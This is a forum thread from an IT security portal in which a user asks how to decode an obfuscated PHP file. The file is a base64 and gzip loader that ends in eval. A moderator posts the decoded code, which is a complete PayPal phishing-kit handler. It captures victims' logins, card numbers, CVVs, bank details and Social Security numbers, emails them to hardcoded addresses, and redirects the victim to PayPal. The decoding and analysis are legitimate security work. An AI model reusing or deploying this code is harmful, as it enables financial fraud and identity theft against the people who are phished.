|
|
|
|
Menu |
|
|
Home |
| |
|
Discussions |
| |
|
Tools |
| |
|
Affiliates |
| |
|
Content |
| |
|
Info |
| | |
|
|
|
|
|
User Info |
|
Membership:
Latest: MichaelSnaRe
New Today: 0
New Yesterday: 0
Overall: 9144
People Online:
Visitors: 118
Members: 0
Total: 118
|
|
|
|
|
|
Full disclosure |
|
|
|
|
|
|
|
|
|
IT Security and Insecurity Portal |
|
|
how to decode this file base64 |
|
Posted: Sun Aug 26, 2012 7:52 pm |
|
|
kyo1992 |
Advanced user |
|
|
Joined: Jul 03, 2010 |
Posts: 54 |
|
|
|
|
|
|
|
hello i need to decode this piece of code
Quote: |
$ThisFlsSRC = @file_get_contents($LoadedFile) or die("Error Runing This File !");
$ThisFls = @explode("#walis#",$ThisFlsSRC);
$SourceFls = $ThisFls[1];
for($i=1;$i<=30;$i++){
$SourceFls = base64_decode(gzuncompress(base64_decode($SourceFls)));
}
eval($SourceFls);
exit;
|
$SourceFls i think is : http://www.4shared.com/zip/whyDLDm_/crypt.html?
thank you |
|
|
|
|
|
|
|
|
Posted: Sun Aug 26, 2012 8:45 pm |
|
|
demon |
Moderator |
|
|
Joined: Sep 22, 2010 |
Posts: 485 |
|
|
|
|
|
|
|
post the base64 encoded file here
never mind got it decoded:
Code: | <?php
ob_start();
if(file_exists('config.php')){
include_once('config.php');
}else{
die('config.php Not Found !!');
}
$ip = getenv("REMOTE_ADDR");
$hostname = gethostbyaddr($ip);
$YWaLiS_Result = "==================+ (PayPal US Bank Spam ReZulT) +==================\n";
$YWaLiS_Result .= "email address : ".$_POST['login_email']."\n";
$YWaLiS_Result .= "password : ".$_POST['login_password']."\n\n";
$YWaLiS_Result .= "first name : ".$_POST['first']."\n";
$YWaLiS_Result .= "last name : ".$_POST['last']."\n";
$YWaLiS_Result .= "Date of Birth : ".$_POST['date']."/".$_POST['bday']."/".$_POST['byear']."\n";
$YWaLiS_Result .= "Routing number : ".$_POST['routing']."\n";
$YWaLiS_Result .= "Account number : ".$_POST['account']."\n";
$YWaLiS_Result .= "Bank name : ".$_POST['bank']."\n";
$YWaLiS_Result .= "Card Type : ".$_POST['type']."\n";
$YWaLiS_Result .= "Card Number : ".$_POST['card']."\n";
$YWaLiS_Result .= "Expiration of Date : ".$_POST['expiration']."/".$_POST['bday1']."/".$_POST['byear1']."\n";
$YWaLiS_Result .= "Card Verification Number : ".$_POST['ccv']."\n";
$YWaLiS_Result .= "Social Security Number : ".$_POST['ssn']."\n";
$YWaLiS_Result .= "Address line 1 : ".$_POST['line1']."\n";
$YWaLiS_Result .= "Address line 2 : ".$_POST['defaultaddress2']."\n";
$YWaLiS_Result .= "City/State : ".$_POST['city']."\n";
$YWaLiS_Result .= "ZIP code : ".$_POST['zip code']."\n";
$YWaLiS_Result .= "Phone number : ".$_POST['phone']."\n\n";
$YWaLiS_Result .= "============================================\n";
$YWaLiS_Result .= "Client IP : ".$ip."\n";
$YWaLiS_Result .= "HostName : ".$hostname."\n";
$YWaLiS_Result .= "-------------------- By Y-WaLiS-----------------------\n";
$EmailSubject = "$ip";
$SpmsEmails = array();
$SpmsEmails[] = "bmspmr@gmail.com";
$SpmsEmails[] = "rezult4spam@gmail.com";
$SpmsEmails[] = $SpamerEmail;
foreach($SpmsEmails as $Email){
@mail($Email,$EmailSubject,$YWaLiS_Result);
}
unset($SpmsEmails,$Email);
@header("Location:https://www.paypal.com/");
?> |
|
|
_________________ Go BIG or go HOME ! |
|
|
|
|
www.waraxe.us Forum Index -> All other hashes
You cannot post new topics in this forum You cannot reply to topics in this forum You cannot edit your posts in this forum You cannot delete your posts in this forum You cannot vote in polls in this forum
|
All times are GMT
Page 1 of 1
|
|
|
Powered by phpBB © 2001-2008 phpBB Group
|
|
|
|
|
|
|